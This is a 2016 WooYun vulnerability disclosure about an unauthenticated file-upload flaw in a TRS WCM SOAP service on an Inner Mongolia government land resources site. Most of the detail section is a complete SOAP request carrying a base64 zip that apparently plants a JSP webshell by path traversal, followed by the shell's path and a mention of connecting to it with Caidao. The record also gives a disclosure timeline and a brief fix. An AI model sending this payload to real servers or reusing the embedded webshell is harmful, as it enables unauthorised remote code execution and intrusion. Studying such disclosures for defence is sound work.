当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0210319

漏洞标题:内蒙古国土资源厅getshell

相关厂商:内蒙古国土资源厅

漏洞作者: 路人甲

提交时间:2016-05-19 14:10

修复时间:2016-07-07 16:50

公开时间:2016-07-07 16:50

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:9

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-19: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

之前看了applychen大神的漏洞分析...
然后,就再网上试了下...
然后,就发现内蒙古国土资源厅存在这个漏洞...

详细说明:

漏洞位置在:http://*.*.*.*/wcm/services/trswcm:SOAPService
问题发生在SOAPServiceImpl.java中的public String importDocuments(byte _pImportFileContent[], String _sFileExt)方法,当_sFileExt为zip时调用importFromZip():
详见applychen的分析 http://**.**.**.**/bugs/wooyun-2010-0162315
可以无需登录直接GETSHELL...
构造WebShell可以按照applychen说的,一步一步来,或者可以参考@小胖子之前的构造方法。
具体构造代码如下:

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/"  xmlns:xsd="http://**.**.**.**/1999/XMLSchema"  xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance"  xmlns:m0="http://**.**.**.**/"  xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/wcm/services/trswcm:SOAPService">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
     <importDocuments>        <in0>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</in0>
         <in1>.zip</in1>
        </importDocuments>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


构造完成后记得加个header直接上传。
成功后webshell路径:http://*.*.*.*/webpic/help.jspx

漏洞证明:

1、漏洞发生位置截图:

5.jpg


2、构造截图:

2.jpg


3、上传完成后截图:

3.jpg


4、菜刀连接截图:

6.jpg


修复方案:

验证ZIP内的文件路径合法性

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-23 16:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价